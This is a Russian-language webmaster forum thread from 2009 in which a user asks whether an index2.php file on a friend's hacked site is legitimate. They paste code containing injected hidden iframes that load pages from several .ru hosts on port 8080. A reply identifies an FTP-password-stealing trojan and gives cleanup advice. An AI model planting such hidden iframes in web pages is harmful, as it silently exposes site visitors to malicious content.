Форум Практика оптимизации Любые вопросы от новичков по оптимизации

Вирус на сайте

[Удален]
794

здравствуйте форемчане! нужна консультация........

двиг ДЛЕ. главная неоткрывается.

на фтп нашел такой файл index2.php - это от цмски или сам вирь - удалить можно? 

<?php

/**

* @version		$Id: index2.php 11407 2009-01-09 17:23:42Z willebil $

* @package		Joomla

* @copyright	Copyright (C) 2005 - 2009 Open Source Matters. All rights reserved.

* @license		GNU/GPL, see LICENSE.php

* Joomla! is free software. This version may have been modified pursuant

* to the GNU General Public License, and as distributed it includes or

* is derivative of works licensed under the GNU General Public License or

* other free or open source software licenses.

* See COPYRIGHT.php for copyright notices and details.

*/



$_REQUEST['tmpl'] = 'component';

include

<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=573 height=272 >

<div style="display:none"><iframe src="http://the-previous.ru:8080/index.php" width=548 height=929 

<div style="display:none"><iframe src="http://inother.ru:8080/index.php" width=650 height=359

<div style="display:none"></div>

<div style="display:none"><iframe src="http://biozavr.ru:8080/index.php" width=966 height=258 ></iframe></div>

сам index.php тоже присутствует, 

$option = JRequest::getCmd('option');



$mainframe->dispatch($option);







// trigger the onAfterDispatch events



JDEBUG ? $_PROFILER->mark('afterDispatch') : null;



$mainframe->triggerEvent('onAfterDispatch');







/**



 * RENDER  THE APPLICATION



 *



 * NOTE :



<div style="display:none"></div>

<div style="display:none"><iframe src="http://biozavr.ru:8080/index.php" width=966 height=258 ></iframe></div>

fkhy7sk добавил 18.09.2009 в 22:38

спс за ответы, все поченил...:)

exsoft
На сайте с 24.08.2007
Offline
128
exsoft
#1

Срочно проверьте свой компютер, и те компьютеры, которые имеют доступ к ftp вашего сайта, это троян, который крадет ваши ftp пароли и изменяет на вашем сервере файлы типа index, home, default и т.п. , изменения заключаются в следуешем в файл добавляются сторки, которые содержат <iframe src="http://..............., проверяйте файлы на наличие этих строк (для надежности лучше проверить все файлы htm, html, php).

И в дальнейшем не сохраняйте пароли в ftp менеджерах.

[Удален]
#2

это немое, у друга.

И в дальнейшем не сохраняйте пароли в ftp менеджерах.

меня интересовала индекс2 это файл двига или нет. БЛОШЕ НИЧЕГО! :)

fkhy7sk добавил 18.09.2009 в 22:43

тема закрыта!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий